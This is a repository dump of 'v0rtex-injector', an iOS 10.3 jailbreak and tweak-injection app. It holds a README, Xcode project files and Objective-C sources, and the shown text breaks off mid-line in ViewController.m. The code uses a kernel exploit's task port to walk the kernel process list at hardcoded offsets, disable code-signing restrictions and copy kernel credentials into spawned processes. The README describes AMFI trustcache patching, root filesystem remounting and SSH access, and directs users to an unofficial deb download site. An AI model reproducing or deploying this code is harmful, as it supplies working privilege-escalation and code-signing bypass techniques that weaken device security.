├── .gitattributes ├── README.md ├── v0rtex-S ├── .gitattributes ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets │ └── AppIcon.appiconset │ │ ├── Contents.json │ │ ├── ipad.png │ │ ├── ipad@2x.png │ │ ├── iphone@2x.png │ │ └── iphone@3x.png ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard ├── Info.plist ├── ViewController.h ├── ViewController.m ├── bash ├── bootstrap.tar ├── common.h ├── cydia │ └── jailbreakd.m ├── cydo ├── dropbear ├── extrainst_ ├── kernel.h ├── kernel.m ├── launchctl ├── ls ├── main.m ├── root-rw.h ├── root-rw.m ├── symbols.h ├── symbols.m ├── tar ├── the_super_fun_part │ ├── amfi.h │ ├── amfi.m │ ├── libjb.a │ ├── libjb.h │ ├── patchfinder64.c │ └── patchfinder64.h ├── v0rtex.h └── v0rtex.m └── v0rtex-s.xcodeproj ├── project.pbxproj ├── project.xcworkspace ├── contents.xcworkspacedata └── xcuserdata │ └── jakejames.xcuserdatad │ └── UserInterfaceState.xcuserstate └── xcuserdata └── jakejames.xcuserdatad ├── xcdebugger └── Breakpoints_v2.xcbkptlist └── xcschemes └── xcschememanagement.plist /.gitattributes: -------------------------------------------------------------------------------- 1 | *.tar filter=lfs diff=lfs merge=lfs -text 2 | bootstrap.tar filter=lfs diff=lfs merge=lfs -text 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # v0rtex-injector beta 7 2 | 3 | Get v0rtex-injector IPA here (BETA 6): https://github.com/thisiswisy/v0rtex-injector/releases/tag/b6 4 | 5 | DEMO IMAGES: https://i.imgur.com/25jpFZN.jpg & https://i.imgur.com/D6dnjFj.png 6 | 7 | What is this & what does it offer? 8 | 9 | - Install tweaks on iOS 10.3.x (Only tweaks that hook SpringBoard will work, you can't change preferences in settings. 
gotta do that manually) 10 | - Not a substrate replacement 11 | - For devs & impatient people 12 | - SSH via USB on port 2222 13 | - No-Tweaks mode in case you don't want tweaks 14 | - Patches the AMFI trustcache using xerub's jailbreak library 15 | - Gets read & write access to the system partition using Todesco's rootfs patch 16 | - Has the ability to empower any process with a given name (creds to ninjaprawn) 17 | - The source code contains a basic jailbreakd to make Cydia work temporarily (creds to cheesecakeufo) 18 | 19 | To install a tweak, find the link to the deb file, run the exploit, paste the link, and click "continue". If you just want to activate your current tweaks, click OK without entering any link 20 | - **INSTALLING TWEAKS IS 100% SAFE, A respring loop can't happen because I am using a modified killall binary instead of what substrate does. Tweaks will load ONLY when you respring manually** THIS TOOL IS ON BETA 6 SO FAR AND IS NOT DANGEROUS IN ANY WAY. WILL NOT INTERFERE WITH NEW JAILBREAKS. 21 | 22 | UPDATE: 23 | 24 | My device bootlooped when trying a new bootstrap and I hadn't set a nonce (gotta wait for a new tfp0 exploit, luckily it was a 5S I can downgrade once that happens, well by that time a full jailbreak will have been released anyway xd) 25 | 26 | UPDATES will happen but not as frequently. I can't try new stuff to fix the activation issue anymore, so I'll just focus on the jailbreakd daemon. As of 30.12.2017 Injector uses a better method to find the proc without involving files and pidof. However, I can't test it, although it should work just fine. A better jailbreakd which runs in a separate process is being worked on. 27 | 28 | ---------------- 29 | NEW IN BETA 7: 30 | 1. Support for iPad Air 2, iPad Mini 3, iPad Mini 4, iPad Pro 10.5" 31 | 2. Added basic jailbreakd daemon (thanks cheesecakeufo) 32 | 3. 
Cydia can install *some* stuff 33 | 34 | - Jailbreakd will only start with respring disabled 35 | - once you quit the app, jailbreakd STOPS and Cydia crashes 36 | 37 | TODO: 38 | 39 | - run jailbreakd in a separate process OR get a proper nosuid patch 40 | - amfid patch (if you're impatient AND on iOS 10.3-10.3.2 just run triple_fetch) 41 | - something like PreferenceLoader 42 | - more iPads 43 | 44 | THERE'S NO IPA YET AND WON'T BE TILL EVERYTHING IS FIXED PROPERLY! NON-DEVS: DO NOT USE BETA 7 45 | 46 | IF YOU USE BETA 7 DO NOT REINSTALL/REMOVE Cydia Substrate! IT *MAY* BREAK ALL OF YOUR TWEAKS 47 | 48 | If you did that and tweaks stopped working, run this via SSH: 49 | 50 | rm /Library/MobileSubstrate/DynamicLibraries && mv /var/stash/*/*/DynamicLibraries /Library/MobileSubstrate/DynamicLibraries 51 | 52 | - Respringing via Cydia will unload all of your tweaks 53 | 54 | ----------------------------------- 55 | NEW IN BETA 6: 56 | 57 | 1. Even more devices 58 | 2. exploit updated, now more reliable 59 | 3. tried to fix ~~Fixed~~ the activation screen issue 60 | 4. hopefully fixed the respring panic issue on A9 devices 61 | 5. you can now load tweaks without a respring (only some will work properly) and with a different method (again - only some will work properly - because of compatibility issues with Method 1) 62 | ------------------------------------------------- 63 | 64 | KNOWN ISSUES: 65 | 66 | - Activation screen on each reboot 67 | - iMessage not working 68 | 69 | Possible fixes: 70 | 1. Reset All Settings 71 | 2. Reset All Contents & Settings 72 | 3. Disable passcode 73 | 74 | 75 | NEW IN BETA 5: 76 | 77 | 1. More devices 78 | 2. tweaks load properly 79 | 3. bootstrap extracts properly 80 | 4. bug fixes 81 | 5. added "reset jailbreak" option. Use this if you have any issues 82 | ------------- 83 | 84 | HOW TO COMPILE??? 85 | 86 | If you're using Xcode 9: 87 | 1. Open Xcode from an admin account 88 | 2. Find any line where system() is mentioned 89 | 3. 
CMD + click on system() -> go to definition 90 | 4. Remove the "IOS_PROHIBITED" line or something like that and save the file 91 | 92 | ------------------------------------------------- 93 | 94 | HOW TO FIND DEB LINK???? 95 | - This gives you **LEGAL** debs straight from their original sources: http://ipod-touch-max.ru/cydia/index.php?cat=search&keyword=YOUR_TWEAK_NAME_HERE 96 | 97 | 98 | tweaks tested & confirmed working by me: 99 | 100 | - Cylinder 101 | - Sleek'n'bouncy 10 102 | - DummyPass 103 | - Zeppelin (working as of b4) 104 | - NoSlowAnimations 105 | - RoundDock 106 | 107 | not working: 108 | 109 | - anemone 110 | 111 | 112 | Supported devices: 113 | 114 | - ALL iPhones, iPods on 10.3-10.3.3 115 | - Some iPads (NO IPA YET!) 116 | 117 | 118 | 119 | thanks to s1guza for the exploit, stek29 for telling me how to get Cydia to work, cheesecakeufo for telling stek29 how to get Cydia to work, xerub for libjb, theninjaprawn for his techniques, PsychoTea, Sticktron (and whoever worked on his project) for some other stuff, Wisy for hosting on his GitHub & cleaning up the code a little bit. 120 | 121 | - Forked from an older version of this: https://github.com/PsychoTea/v0rtex-S 122 | - Got the cydo binary from an older version of this: https://github.com/iabem97/topanga 123 | - Got the jailbreakd idea from this: https://github.com/iabem97/topanga 124 | - Got a lot of techniques from this: https://github.com/ninjaprawn/ 125 | - Got the amfi patch from this: https://github.com/xerub/extra_recipe/tree/kppless 126 | 127 | Mr.Cryptiic: happy now? 
128 | 129 | ------ 130 | 131 | brought to you by Jake 132 | -------------------------------------------------------------------------------- /v0rtex-S/.gitattributes: -------------------------------------------------------------------------------- 1 | bootstrap.tar filter=lfs diff=lfs merge=lfs -text 2 | -------------------------------------------------------------------------------- /v0rtex-S/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // v0rtex 4 | // 5 | // Created by Sticktron on 2017-12-07. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /v0rtex-S/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // v0rtex 4 | // 5 | // Created by Sticktron on 2017-12-07. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. 
Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 
48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "size" : "60x60", 35 | "idiom" : "iphone", 36 | "filename" : "iphone@2x.png", 37 | "scale" : "2x" 38 | }, 39 | { 40 | "size" : "60x60", 41 | "idiom" : "iphone", 42 | "filename" : "iphone@3x.png", 43 | "scale" : "3x" 44 | }, 45 | { 46 | "idiom" : "ipad", 47 | "size" : "20x20", 48 | "scale" : "1x" 49 | }, 50 | { 51 | "idiom" : "ipad", 52 | "size" : "20x20", 53 | "scale" : "2x" 54 | }, 55 | { 56 | "idiom" : "ipad", 57 | "size" : "29x29", 58 | "scale" : "1x" 59 | }, 60 | { 61 | "idiom" : "ipad", 62 | "size" : "29x29", 63 | "scale" : "2x" 64 | }, 65 | { 66 | "idiom" : "ipad", 67 | "size" : "40x40", 68 | "scale" : "1x" 69 | }, 70 | { 71 | "idiom" : "ipad", 72 | "size" : "40x40", 73 | "scale" : "2x" 74 | }, 75 | { 76 | "size" : "76x76", 77 | "idiom" : "ipad", 78 | "filename" : "ipad.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "76x76", 83 | "idiom" : "ipad", 84 | "filename" : "ipad@2x.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "idiom" : "ipad", 89 | "size" : "83.5x83.5", 90 | "scale" : "2x" 91 | }, 92 | { 93 | "idiom" : "ios-marketing", 94 | "size" : "1024x1024", 95 | "scale" : "1x" 96 | } 97 | ], 98 | "info" : { 99 | "version" : 1, 100 | "author" : "xcode" 101 | } 102 | } 
-------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/Assets.xcassets/AppIcon.appiconset/ipad.png -------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/ipad@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/Assets.xcassets/AppIcon.appiconset/ipad@2x.png -------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/iphone@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/Assets.xcassets/AppIcon.appiconset/iphone@2x.png -------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/iphone@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/Assets.xcassets/AppIcon.appiconset/iphone@3x.png -------------------------------------------------------------------------------- /v0rtex-S/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 31 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- 
/v0rtex-S/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 53 | 59 | 60 | 61 | 62 | 63 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 86 | 87 | 88 | 89 | 90 | 96 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /v0rtex-S/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleDisplayName 8 | v0rtex-S 9 | CFBundleExecutable 10 | $(EXECUTABLE_NAME) 11 | CFBundleIdentifier 12 | $(PRODUCT_BUNDLE_IDENTIFIER) 13 | CFBundleInfoDictionaryVersion 14 | 6.0 15 | CFBundleName 16 | $(PRODUCT_NAME) 17 | CFBundlePackageType 18 | APPL 19 | CFBundleShortVersionString 20 | 1.0 21 | CFBundleVersion 22 | 1 23 | LSRequiresIPhoneOS 24 | 25 | UILaunchStoryboardName 26 | LaunchScreen 27 | UIMainStoryboardFile 28 | Main 29 | UIRequiredDeviceCapabilities 30 | 31 | armv7 32 | 33 | UISupportedInterfaceOrientations 34 | 35 | UIInterfaceOrientationPortrait 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | NSAppTransportSecurity 46 | 47 | NSAllowsArbitraryLoads 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /v0rtex-S/ViewController.h: 
-------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // v0rtex 4 | // 5 | // Created by Sticktron on 2017-12-07. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | @property (weak, nonatomic) IBOutlet UISwitch *reinstallcydia; 13 | @property (weak, nonatomic) IBOutlet UISwitch *hastweaks; 14 | @property (weak, nonatomic) IBOutlet UISegmentedControl *method; 15 | @property (weak, nonatomic) IBOutlet UISwitch *shallrespring; 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /v0rtex-S/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // v0rtex 4 | // 5 | // Created by Sticktron on 2017-12-07. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | #include "v0rtex.h" 12 | #include "kernel.h" 13 | #include "symbols.h" 14 | #include "root-rw.h" 15 | #include "the_super_fun_part/amfi.h" 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | /* Shared state: runsploit zeroes all four before each run and passes their addresses to v0rtex() to be filled in. The parameters of execprog/execprog_clean with the same names shadow these globals. */ 23 | task_t tfp0; 24 | kptr_t kslide; 25 | kptr_t kern_ucred; 26 | kptr_t self_proc; 27 | 28 | //get executable path 29 | 30 | /* Returns the main bundle's resources directory as a NUL-terminated path in a freshly malloc'd 4096-byte buffer. The caller owns the buffer; the only visible caller (runsploit) never frees it. NOTE(review): resourcesURL comes from a Copy function and is never CFRelease'd, and the return value of CFURLGetFileSystemRepresentation is not checked, so on failure the returned buffer is uninitialized. */ char* bundle_path() { 31 | CFBundleRef mainBundle = CFBundleGetMainBundle(); 32 | CFURLRef resourcesURL = CFBundleCopyResourcesDirectoryURL(mainBundle); 33 | int len = 4096; 34 | char* path = malloc(len); 35 | 36 | CFURLGetFileSystemRepresentation(resourcesURL, TRUE, (UInt8*)path, len); 37 | 38 | return path; 39 | } 40 | 41 | //execute 42 | //thanks PsychoTea and whoever worked on his fork of v0rtex 43 | 44 | /* Spawns prog with args (a NULL args defaults to { prog, NULL }), redirects the child's stdout and stderr to a fresh logfile under /v0rtex/logs, optionally adjusts the child's flags through tfp0 when kern_ucred is non-zero, waits for it, echoes the log to stdout and removes it. Returns the posix_spawn*() error value when spawning fails, 1 when the logfile cannot be reopened, 0 otherwise. NOTE(review): the compound literal used for the default args has automatic storage tied to the enclosing if-block, so args refers to a dead object once the block ends (execprog_clean has the same pattern); declare the default array at function scope instead. */ int execprog(task_t tfp0, uint64_t kslide, uint64_t kern_ucred, const char *prog, const char* args[]) { 45 | if (args == NULL) { 46 | args = (const char **)&(const char*[]){ prog, NULL }; 47 | } 48 | 49 | const char *logfile = [NSString 
stringWithFormat:@"/v0rtex/logs/%@-%lu", 50 | [[NSMutableString stringWithUTF8String:prog] stringByReplacingOccurrencesOfString:@"/" withString:@"_"], 51 | time(NULL)].UTF8String; /* logfile is the UTF8String of an autoreleased NSString; it is only valid until the current autorelease pool drains, which covers this synchronous function but nothing that outlives the call. */ 52 | printf("Spawning [ "); 53 | for (const char **arg = args; *arg != NULL; ++arg) { 54 | printf("'%s' ", *arg); 55 | } 56 | printf("] to logfile [ %s ] \n", logfile); 57 | 58 | /* NOTE(review): the posix_spawn_file_actions_* functions return an errno value rather than setting errno, so the perror() calls below print whatever errno happened to hold; report strerror(rv) as the posix_spawn branch does. Neither the early returns nor the success path call posix_spawn_file_actions_destroy(), so child_fd_actions leaks on every path. */ int rv; 59 | posix_spawn_file_actions_t child_fd_actions; 60 | if ((rv = posix_spawn_file_actions_init (&child_fd_actions))) { 61 | perror ("posix_spawn_file_actions_init"); 62 | return rv; 63 | } 64 | /* The child's stdout (and, via the dup2 below, stderr) goes to logfile, created 0666 inside /v0rtex/logs, which runsploit creates 0777: the log is world-readable and world-writable while the child runs. 0600 is enough, since this same process reads it back. */ if ((rv = posix_spawn_file_actions_addopen (&child_fd_actions, STDOUT_FILENO, logfile, 65 | O_WRONLY | O_CREAT | O_TRUNC, 0666))) { 66 | perror ("posix_spawn_file_actions_addopen"); 67 | return rv; 68 | } 69 | if ((rv = posix_spawn_file_actions_adddup2 (&child_fd_actions, STDOUT_FILENO, STDERR_FILENO))) { 70 | perror ("posix_spawn_file_actions_adddup2"); 71 | return rv; 72 | } 73 | 74 | pid_t pd; 75 | if ((rv = posix_spawn(&pd, prog, &child_fd_actions, NULL, (char**)args, NULL))) { 76 | printf("posix_spawn error: %d (%s)\n", rv, strerror(rv)); 77 | return rv; 78 | } 79 | 80 | printf("process spawned with pid %d \n", pd); 81 | 82 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 83 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 84 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 85 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 86 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 87 | 88 | /* 89 | 1. read 8 bytes from proc+0x100 into self_ucred 90 | 2. read 8 bytes from kern_ucred + 0x78 and write them to self_ucred + 0x78 91 | 3. 
write 12 zeros to self_ucred + 0x18 92 | */ 93 | 94 | // find_allproc will crash, currently 95 | // please fix 96 | if (kern_ucred != 0) { 97 | int tries = 3; 98 | while (tries-- > 0) { 99 | sleep(1); 100 | uint64_t proc = rk64(tfp0, kslide + 0xFFFFFFF0075E66F0); 101 | while (proc) { 102 | uint32_t pid = rk32_via_tfp0(tfp0, proc + 0x10); 103 | if (pid == pd) { 104 | uint32_t csflags = rk32_via_tfp0(tfp0, proc + 0x2a8); 105 | csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW) & ~(CS_RESTRICT | CS_HARD); 106 | wk32(tfp0, proc + 0x2a8, csflags); 107 | tries = 0; 108 | 109 | // i don't think this bit is implemented properly 110 | uint64_t self_ucred = rk64(tfp0, proc + 0x100); 111 | uint32_t selfcred_temp = rk32_via_tfp0(tfp0, kern_ucred + 0x78); 112 | wk32(tfp0, self_ucred + 0x78, selfcred_temp); 113 | 114 | for (int i = 0; i < 3; i++) { 115 | wk32(tfp0, self_ucred + 0x18 + (i * sizeof(uint32_t)), 0); 116 | } 117 | 118 | printf("gave elevated perms to pid %d \n", pid); 119 | 120 | // original stuff, rewritten above using v0rtex stuff 121 | // kcall(find_copyout(), 3, proc+0x100, &self_ucred, sizeof(self_ucred)); 122 | // kcall(find_bcopy(), 3, kern_ucred + 0x78, self_ucred + 0x78, sizeof(uint64_t)); 123 | // kcall(find_bzero(), 2, self_ucred + 0x18, 12); 124 | break; 125 | } 126 | proc = rk64(tfp0, proc); 127 | } 128 | } 129 | } 130 | 131 | /* NOTE(review): waitpid's result is not checked; if it fails (e.g. EINTR) status is read uninitialized by the printf that follows. */ int status; 132 | waitpid(pd, &status, 0); 133 | printf("'%s' exited with %d (sig %d)\n", prog, WEXITSTATUS(status), WTERMSIG(status)); 134 | 135 | /* Echo the child's log back to our stdout, then delete it. */ char buf[65] = {0}; 136 | int fd = open(logfile, O_RDONLY); 137 | if (fd == -1) { 138 | perror("open logfile"); 139 | return 1; 140 | } 141 | 142 | printf("contents of %s: \n ------------------------- \n", logfile); 143 | /* NOTE(review): buf is zeroed only once. A final short read leaves stale bytes of the previous chunk after the new data, a read of 0 or -1 makes the trailing printf reprint the previous chunk, and any NUL in the log truncates a chunk at printf("%s"). Loop while (n = read(...)) > 0 and fwrite(buf, 1, n, stdout) instead. */ while(read(fd, buf, sizeof(buf) - 1) == sizeof(buf) - 1) { 144 | printf("%s", buf); 145 | } 146 | printf("%s", buf); 147 | printf("\n-------------------------\n"); 148 | 149 | close(fd); 150 | remove(logfile); 151 | 152 | return 0; 153 | } 154 
| 155 | int execprog_clean(task_t tfp0, uint64_t kslide, uint64_t kern_ucred, const char *prog, const char* args[]) { 156 | if (args == NULL) { 157 | args = (const char **)&(const char*[]){ prog, NULL }; 158 | } 159 | 160 | int rv; 161 | pid_t pd; 162 | if ((rv = posix_spawn(&pd, prog, NULL, NULL, (char**)args, NULL))) { 163 | printf("posix_spawn error: %d (%s)\n", rv, strerror(rv)); 164 | return rv; 165 | } 166 | 167 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 168 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 169 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 170 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 171 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 172 | 173 | /* 174 | 1. read 8 bytes from proc+0x100 into self_ucred 175 | 2. read 8 bytes from kern_ucred + 0x78 and write them to self_ucred + 0x78 176 | 3. write 12 zeros to self_ucred + 0x18 177 | */ 178 | 179 | if (kern_ucred != 0) { 180 | int tries = 3; 181 | while (tries-- > 0) { 182 | sleep(1); 183 | // this needs to be moved to an offset VVVVVVVVVVVVV 184 | uint64_t proc = rk64(tfp0, kslide + 0xFFFFFFF0075E66F0); 185 | while (proc) { 186 | uint32_t pid = rk32_via_tfp0(tfp0, proc + 0x10); 187 | if (pid == pd) { 188 | uint32_t csflags = rk32_via_tfp0(tfp0, proc + 0x2a8); 189 | csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW) & ~(CS_RESTRICT | CS_HARD); 190 | wk32(tfp0, proc + 0x2a8, csflags); 191 | tries = 0; 192 | 193 | // i don't think this bit is implemented properly 194 | uint64_t self_ucred = rk64(tfp0, proc + 0x100); 195 | uint32_t selfcred_temp = rk32_via_tfp0(tfp0, kern_ucred + 0x78); 196 | wk32(tfp0, self_ucred + 0x78, selfcred_temp); 197 | 198 | for (int i = 0; i < 3; i++) { 199 | wk32(tfp0, self_ucred + 0x18 + (i * sizeof(uint32_t)), 0); 200 | } 201 | 202 | // original stuff, rewritten above using v0rtex stuff 203 | // kcall(find_copyout(), 3, proc+0x100, 
&self_ucred, sizeof(self_ucred)); 204 | // kcall(find_bcopy(), 3, kern_ucred + 0x78, self_ucred + 0x78, sizeof(uint64_t)); 205 | // kcall(find_bzero(), 2, self_ucred + 0x18, 12); 206 | break; 207 | } 208 | proc = rk64(tfp0, proc); 209 | } 210 | } 211 | } 212 | 213 | int status; 214 | waitpid(pd, &status, 0); 215 | return status; 216 | } 217 | @interface ViewController () 218 | @property (weak, nonatomic) IBOutlet UITextView *outputView; 219 | @property (weak, nonatomic) IBOutlet UIButton *sploitButton; 220 | @end 221 | 222 | @implementation ViewController 223 | 224 | - (void)viewDidLoad { 225 | [super viewDidLoad]; 226 | 227 | self.sploitButton.layer.cornerRadius = 6; 228 | self.outputView.layer.cornerRadius = 6; 229 | 230 | // Attempt to init our offsets 231 | // Disable the run button if no offsets were found 232 | if (!init_symbols()) { 233 | [self writeText:@"Device not supported."]; 234 | [self.sploitButton setHidden:TRUE]; 235 | return; 236 | } 237 | 238 | [self writeText:@"> ready."]; 239 | } 240 | 241 | - (IBAction)runSploitButton:(UIButton *)sender { 242 | if ([self.hastweaks isOn]) { 243 | UIAlertController * alertController = [UIAlertController alertControllerWithTitle: @"Install deb" 244 | message: @"If you want to install a deb, do it now, otherwise leave this blank" 245 | preferredStyle:UIAlertControllerStyleAlert]; 246 | [alertController addTextFieldWithConfigurationHandler:^(UITextField *textField) { 247 | textField.placeholder = @"deb link"; 248 | textField.keyboardType = UIKeyboardTypeDefault; 249 | }]; 250 | 251 | [alertController addAction:[UIAlertAction actionWithTitle:@"Continue" style:UIAlertActionStyleDefault handler:^(UIAlertAction *action) { 252 | NSArray * textfields = alertController.textFields; 253 | UITextField * namefield = textfields[0]; 254 | NSLog(@"%@",namefield.text); 255 | 256 | NSURL *url = [NSURL URLWithString:namefield.text]; 257 | NSData *urlData = [NSData dataWithContentsOfURL:url];//download deb 258 | if (urlData) 259 | { 
260 | NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES); 261 | NSString *documentsDirectory = [paths objectAtIndex:0]; 262 | NSString *filePath = [NSString stringWithFormat:@"%@/%@", documentsDirectory,@"tweak.deb"]; 263 | [urlData writeToFile:filePath atomically:YES];//save it 264 | sleep(2); 265 | } 266 | [self runsploit]; 267 | 268 | }]]; 269 | [self presentViewController:alertController animated:YES completion:nil]; 270 | } 271 | else { 272 | [self runsploit]; 273 | } 274 | } 275 | - (void)runsploit{ 276 | 277 | // Run v0rtex 278 | [self writeText:@"> running exploit..."]; 279 | 280 | tfp0 = MACH_PORT_NULL; 281 | kslide = 0; 282 | kern_ucred = 0; 283 | self_proc = 0; 284 | 285 | kern_return_t ret = v0rtex(NULL, NULL, &tfp0, &kslide, &kern_ucred, &self_proc); 286 | 287 | if (ret != KERN_SUCCESS) { 288 | [self writeText:@"ERROR: exploit failed"]; 289 | return; 290 | } 291 | 292 | [self writeText:@"exploit succeeded!"]; 293 | 294 | 295 | // Write a test file to var 296 | 297 | [self writeText:@"writing test file..."]; 298 | 299 | extern kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); 300 | uint32_t magic = 0; 301 | mach_vm_size_t sz = sizeof(magic); 302 | ret = mach_vm_read_overwrite(tfp0, 0xfffffff007004000 + kslide, sizeof(magic), (mach_vm_address_t)&magic, &sz); 303 | LOG("mach_vm_read_overwrite: %x, %s", magic, mach_error_string(ret)); 304 | 305 | FILE *varF = fopen("/var/mobile/test.txt", "w"); 306 | LOG("var file: %p", varF); 307 | if (varF == 0) { 308 | [self writeText:@"ERROR: failed to write test var file"]; 309 | return; 310 | } 311 | 312 | [self writeText:@"wrote test var file!"]; 313 | [self writeText:[NSString stringWithFormat:@"/var/mobile/test.txt (%p)", varF]]; 314 | 315 | 316 | // Remount '/' as r/w 317 | 318 | int remountOutput = mount_root(tfp0, kslide); 319 | LOG("remount: %d", 
